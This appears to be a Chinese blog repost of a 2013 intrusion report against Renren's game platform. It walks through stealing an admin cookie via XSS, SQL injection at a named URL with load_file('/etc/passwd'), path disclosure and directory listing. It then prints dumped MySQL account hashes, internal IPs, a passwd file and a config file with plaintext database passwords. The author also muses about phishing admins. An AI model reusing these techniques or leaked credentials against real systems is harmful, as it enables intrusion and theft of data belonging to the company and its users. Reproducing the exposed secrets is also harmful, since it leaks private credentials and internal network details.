《苏菲的世界》经典语:你是谁?世界从哪里来?同样适用于我们每个人,软件测试路在何方,路在脚下!!!

人人网游戏XSS+SQL注入+爆路径+列目录,员工信息大量泄漏

上一篇 / 下一篇  2013-03-25 16:57:06 / 个人分类:相关知识

XSS偷取cookies,还有注入,权限蛮大的哦,能直接load_file('/etc/passwd')
目测拿下wan.renren.com
http://wan.renren.com/service.shtml
首先这里随便找了一个客服,提交时插入XSS代码,似乎名字那里,忘记了,然后cookies就来了
然后进后台,高级管理员哦
 
爆路径 http://rrcrm.data.io8.org/lib/
/data/web/crm.imop.com/
 
sql注入 http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
必须验证cookies才能注入
 
 
arget:http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
Host IP:60.29.248.160
Powered-by:PHP/5.2.5
Web Server:lighttpd/1.4.13
DB Server:MySQL >=5
Resp. Time(avg):149 ms
Current User:root@localhost
Sql Version:5.1.38-community-log
Current DB:CRM
System User:root@localhost
Host Name:TJHY248-160.opi.com
Installation dir:/
DB User & Pass:root:053a9bf72434f7f8:localhost
root:*84FC659A33D523EACAFFDD441B0D3FB5A114E791:TJHY248-160.opi.com
xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.227.25
msgweb:32ce979f1810450d:%
gamesum:*04ED80791E1E83935FCFB04DB251B8923CA52276:10%
stat:532a371916879d65:%
gc_imop:*543E075F9BD62E4B2C39F12CD7BDDAA75A6E8A40:10.22.225.%
webcrm:63e483b832b5e91a:%
xiaonei_ts:38e845946c9b5163:10.22.225.110
crm_zl:0e1493ed782f704c:10.4.130.79
ssgc:*A0BBFCF8936A3F109DC2CBB177EB06FF98E7C18D:10.22.225.238
replication:565491d704013245:10.22.225.20
xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.225.105
kaixin_ts:*0AC48CFDD7C65E4137893E7D2CA9CEFA95130238:10.22.225.116
crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.3.32.11
webcrm:*5A7EAE355A763D62D1B53ED34463A18E2EFC3837:10.22.225.28
kaixin_sg:*4F9D6AA51C3DDCEF52A115B296A6BFC49F397541:10.22.227.25
daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.6.57.60
daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.30.33.56
replication:565491d704013245:10.30.32.141
renren_hh:*43AED5659370B63BA30CE41A5EE8D31FBB7A0A36:10.30.34.34
crmsum:*07917BFF5284F50A2D7399560A0110F100CBB23C:10.22.225.29
crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.30.37.160
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.89
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.90
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.30.33.80
renren_sz:09d725012d72e6ab:10.30.37.22
renren_lzr:09d725012d72e6ab:10.22.227.110
replication:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.%
wangkun:27df606e7932e98c:%
zhenyu.shang:658d4f1d5d32391d:10.%
kettle:565491d704013245:%
Data Bases:information_schema
CRM
CRMUSER
binlogs
mysql
testcrm
tongyongcrm
user_classfy
 
 
下来找找passwd
 
 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
zabbix:x:500:500:Zabbix User:/home/zabbix:/bin/false
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash
 
然后是mysql等数据库配置 
 
/data/web/crm.imop.com/config.inc.php
 
<?php
/**
 * 设置数据库连接参数
 */
$cfg['sqlserv'] = 'localhost';
 
$cfg['sqluser'] = 'root';
 
$cfg['sqlpass'] = 'crm123li';
 
$cfg['sqllibr'] = 'CRM';
 
/**
 * 页面TITLE
 */
$cfg['title'] = 'CRM管理系统2011';
 
/**
 * 设置模板路径
 */
$cfg['template'] = 'templates';
 
$cfg['template_c'] = 'templates_c';
 
$color = array("black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44","black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44");
 
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','crm123li');
define('CRM_DB','CRM');
 
 
define('MARKET_ALL_HOST','sg.data.io8.org:3306');
define('MARKET_ALL_USER','stat');
define('MARKET_ALL_PWD','petnewstatZL123');
define('MARKET_ALL_DB','market_all');
 
//define("GAME_HOST","10.30.32.126:3306");
define("GAME_HOST","10.22.222.23");
define("GAME_USER","webcrm");
define("GAME_PWD","webcrm123");
define("GAME_DB","GAMEUSER");
define("GAMEPAY_DB","GAMEPAY");//后台算数
 
define("MGC_HOST","10.22.225.87:3306");
define("MGC_USER","webcrm");
define("MGC_PWD","webcrm123");
define("MGC_DB","GAMEUSER");
 
define("SSWEB_HOST","10.22.225.61:5003");
define("SSWEB_USER","webcrm");
define("SSWEB_PWD","webcrm123");
define("SSWEB_DB","ss_web");
 
//define("SSGC_HOST","10.22.225.22:4001");
//define("SSGC_USER","webcrm");
//define("SSGC_PWD","webcrm123");
//define("SSGC_DB","GAMEUSER");
 
define("SSGC_HOST","10.22.238.140:3306");
define("SSGC_USER","webcrm");
define("SSGC_PWD","webcrm123");
define("SSGC_DB","GAMEUSER");
 
 
define("SSCRM_HOST",'localhost:3306');
define("SSCRM_USER",'webcrm');
define("SSCRM_PWD",'webcrm123');
define("SSCRM_DB",'SSCRM');
 
//define("SHOP_HOST","10.22.225.34:3306");
define("SHOP_HOST","10.30.36.201");
define("SHOP_USER","webcrm");
define("SHOP_PWD","webcrm123");
define("SHOP_DB","mop_shop");
 
//校内中心
define("XIAONEI_HOST","10.22.225.115:3306");
define("XIAONEI_USER","webcrm");
define("XIAONEI_PWD",'webcrm123');
define("XIAONEI_DB","XNTSGAMELOCALPAY");
 
//算数DB
define("SUM_HOST","crmdb.data.io8.org");
define("SUM_USER","webcrm");
define("SUM_PWD",'webcrm123');
define("SUM_DB","CRMUSER");
 
//信息服务器db
define("MSG_HOST","10.30.32.95:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'webcrm123');
define("MSG_DB","IMOPMSG");
 
//分页设置
define("PAGE_MAX", 20);
define("PAGE_NUM", 10);
 
 
?>
 
好多
 
顺便发现个fck
http://cms-na.tech.io8.org/fckeditor/
http://rrcrm.data.io8.org/lib/FCKeditor/
 
 
另外,进后台后可以修改公告,没有任何过滤,如果我给弄个基础认证钓鱼的话,嘿嘿,也许还能搞到点游戏号
 
最后说一下,我发现他游戏后台的默认密码全部是123456
 
修复方案:
 
过滤XSS,然后限制管理员权限,加强培训


版权声明:本文转载于红黑联盟http://www.2cto.com/Article/201303/197680.html


TAG: 漏洞 人人网

 

评分:0

我来说两句

张亚洲

张亚洲

人生不如意十常八九,伤春、悲秋解决不了问题!!!

日历

« 2024-03-24  
     12
3456789
10111213141516
17181920212223
24252627282930
31      

数据统计

  • 访问量: 180644
  • 日志数: 49
  • 建立时间: 2012-06-21
  • 更新时间: 2017-07-09

RSS订阅

Open Toolbar